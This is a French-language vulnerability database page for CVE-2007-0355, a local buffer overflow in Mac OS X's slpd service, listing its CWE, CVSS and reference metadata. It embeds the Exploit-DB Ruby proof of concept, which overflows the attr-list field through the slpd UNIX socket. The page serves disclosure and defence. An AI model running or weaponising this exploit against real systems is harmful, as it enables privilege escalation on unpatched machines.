CVE-2007-0355 : Détail

CVE-2007-0355

Overflow
2.01%V4
Local
2007-01-19
00h00 +00:00
2017-10-18
12h57 +00:00
Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Gestion des notifications

Descriptions du CVE

Buffer overflow in the Apple Minimal SLP v2 Service Agent (slpd) in Mac OS X 10.4.11 and earlier, including 10.4.8, allows local users, and possibly remote attackers, to gain privileges and possibly execute arbitrary code via a registration request with an invalid attr-list field.

Informations du CVE

Faiblesses connexes

CWE-ID Nom de la faiblesse Source
CWE-119 Improper Restriction of Operations within the Bounds of a Memory Buffer
The product performs operations on a memory buffer, but it reads from or writes to a memory location outside the buffer's intended boundary. This may result in read or write operations on unexpected memory locations that could be linked to other variables, data structures, or internal program data.

Métriques

Métriques Score Gravité CVSS Vecteur Source
V2 7.2 AV:L/AC:L/Au:N/C:C/I:C/A:C nvd@nist.gov

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

Score EPSS

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Percentile EPSS

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

Informations sur l'Exploit

Exploit Database EDB-ID : 3151

Date de publication : 2007-01-17 23h00 +00:00
Auteur : MoAB
EDB Vérifié : Yes

#!/usr/bin/ruby # (c) Copyright 2006 Lance M. Havok <lmh [at] info-pull.com> # Kevin Finisterre <kf_lists [at] digitalmunition.com> # All pwnage reserved. # # Proof of concept for MOAB-17-01-2007 # http://projects.info-pull.com/moab/MOAB-17-01-2007.html # # Originally reported to Apple by Kevin, on 08/02/2006. require 'socket' target_path = (ARGV[0] || '/var/run/slp_ipc') slp_socket = UNIXSocket.open(target_path) payload = ("\x58" * 506) payload << [0xdeadbeef].pack("V") # ...it expects a valid mem. address (ex. 0xbffff398) stream = "\x01" + # SrvRqst = 1 "\x00\x13" + # Length of remaining fields? (up to attr-list) "\x04\x00\x00\x00\x00\x00\x00" + "\x00\x02\x00\x00" + # length of scope-list string "\x78\x78" + # <scope-list> "\xff\x03\x00\x00" + # length of attr-list string 0x3ff = 1023 in hex. (payload) # <attr-list> slp_socket.write stream slp_socket.close # milw0rm.com [2007-01-18]

Products Mentioned

Configuraton 0

Apple>>Minimal_slp_service_agent >> Version 10.4.11

    Configuraton 0

    Apple>>Mac_os_x >> Version 10.4.8

    Références

    http://securitytracker.com/id?1019359
    Tags : vdb-entry, x_refsource_SECTRACK
    https://www.exploit-db.com/exploits/3151
    Tags : exploit, x_refsource_EXPLOIT-DB
    http://securitytracker.com/id?1017533
    Tags : vdb-entry, x_refsource_SECTRACK
    http://www.osvdb.org/32693
    Tags : vdb-entry, x_refsource_OSVDB
    http://www.vupen.com/english/advisories/2007/0239
    Tags : vdb-entry, x_refsource_VUPEN
    http://www.us-cert.gov/cas/techalerts/TA08-043B.html
    Tags : third-party-advisory, x_refsource_CERT
    http://secunia.com/advisories/23796
    Tags : third-party-advisory, x_refsource_SECUNIA
    http://www.securityfocus.com/bid/22101
    Tags : vdb-entry, x_refsource_BID